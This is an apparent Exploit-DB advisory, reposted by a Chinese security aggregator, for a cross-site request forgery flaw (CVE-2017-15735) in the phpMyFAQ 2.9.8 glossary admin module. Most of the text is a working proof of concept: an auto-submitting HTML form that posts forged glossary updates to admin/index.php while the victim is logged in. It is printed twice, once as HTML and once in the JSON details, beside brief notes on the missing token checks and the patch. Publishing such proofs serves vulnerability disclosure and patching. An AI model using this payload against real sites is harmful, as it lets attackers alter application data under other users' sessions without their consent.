[webapps] phpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)
phpMyFAQ 2.9.8 存在跨站请求伪造(CSRF)漏洞,影响 glossary 模块的增删改操作。攻击者可构造恶意页面诱使已认证用户执行未授权操作。补丁增加了 CSRF 令牌验证以修复该问题。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
phpMyFAQ 2.9.8 存在跨站请求伪造(CSRF)漏洞,影响 glossary 模块的增删改操作。攻击者可构造恶意页面诱使已认证用户执行未授权操作。补丁增加了 CSRF 令牌验证以修复该问题。 2025-12-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏
# Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15735
PoC:
While still logged in, open another browser window:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php?action=updateglossary" method="POST">
<input type="hidden" name="id" value="1">
<input type="hidden" name="item" value="Malicious Glossary Item">
<input type="hidden" name="definition" value="This is a malicious definition.">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Some Details:
{
"Protection Mechanisms Before Patch": "There was no CSRF token validation in place for the glossary modification actions (add, update, delete). The patch introduced CSRF token checks for both POST and GET requests to ensure that only authorized sessions could perform these actions.",
"File Navigation Chain": "Public Access Entry URL -> phpmyfaq/admin/index.php -> glossary.main.php -> glossary.edit.php",
"Execution Path Constraints": "The user must be authenticated with the necessary permissions ('editglossary') to reach and interact with the glossary functionality through the 'index.php' entry point. Without proper authentication, the server redirects to the login form.",
"Request Parameters": "id, item, definition",
"Request Method": "POST",
"Request URL": "http://phpmyfaq/admin/index.php?action=updateglossary",
"Final PoC": "```\n<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=updateglossary\" method=\"POST\">\n <input type=\"hidden\" name=\"id\" value=\"1\">\n <input type=\"hidden\" name=\"item\" value=\"Malicious Glossary Item\">\n <input type=\"hidden\" name=\"definition\" value=\"This is a malicious definition.\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>document.forms[0].submit();</script>\n </body>\n</html>\n```"
}
[Replace Your Domain Name]
文章来源: https://www.exploit-db.com/exploits/52458
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh